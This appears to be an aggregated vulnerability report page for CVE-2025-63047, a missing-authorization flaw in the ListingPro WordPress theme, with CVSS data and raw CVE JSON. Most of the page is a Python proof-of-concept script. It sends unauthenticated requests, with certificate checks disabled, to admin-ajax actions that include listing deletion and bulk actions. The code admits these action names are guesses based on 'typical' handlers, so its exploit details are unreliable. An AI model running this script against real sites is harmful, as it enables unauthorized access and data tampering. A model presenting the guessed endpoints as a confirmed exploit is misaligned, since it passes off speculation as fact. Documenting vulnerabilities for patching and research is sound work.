Security Vulnerability Report
中文
CVE-2025-63047 CVSS 5.3 MEDIUM

CVE-2025-63047

Published: 2025-12-09 16:18:10
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through <= 2.9.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ListingPro WordPress主题 <= 2.9.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63047 PoC - ListingPro Theme Broken Access Control # Affected: ListingPro WordPress Theme <= 2.9.9 # Type: Missing Authorization / Broken Access Control import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-63047 This PoC attempts to access admin functions without authentication """ # Remove trailing slash if present target_url = target_url.rstrip('/') # Common AJAX endpoints used by ListingPro theme ajax_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-content/themes/listingpro/include/ajax-actions.php' ] # Vulnerable actions that should require authentication # These are examples based on typical ListingPro AJAX handlers vulnerable_actions = [ 'lp_ajax_action', 'listingpro_get_stats', 'listingpro_export_data', 'lp_update_user_profile', 'lp_delete_listing', 'lp_bulk_actions' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE: CVE-2025-63047") print(f"[*] Vulnerability: Missing Authorization in ListingPro Theme\n") for endpoint in ajax_endpoints: url = target_url + endpoint for action in vulnerable_actions: try: # Send request without authentication cookies data = { 'action': action, 'security': '', # No nonce provided } response = requests.post(url, data=data, timeout=10, verify=False) # Check if the response indicates successful unauthorized access # Successful exploitation typically returns 200 with data # Failed access returns 403, 401, or redirects to login if response.status_code == 200: # Additional check: verify response contains sensitive data if 'user' in response.text.lower() or 'admin' in response.text.lower(): print(f"[!] VULNERABLE: {url} with action={action}") print(f"[!] Response status: {response.status_code}") print(f"[!] Response preview: {response.text[:200]}...") return True # Check for other vulnerability indicators if 'lp-nonce' in response.text or 'security' in response.text: print(f"[*] Potential target found: {url} with action={action}") print(f"[*] Response contains security tokens - may be exploitable with further analysis") except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") print("\n[*] Basic check completed.") print("[*] Manual verification recommended using Burp Suite.") print("[*] Check for: ") print(" 1. Unauthenticated access to user data endpoints") print(" 2. Admin functions callable without privileges") print(" 3. IDOR vulnerabilities in listing/user operations") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-63047_poc.py <target_url>") print("Example: python cve-2025-63047_poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63047", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:10.020", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through <= 2.9.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}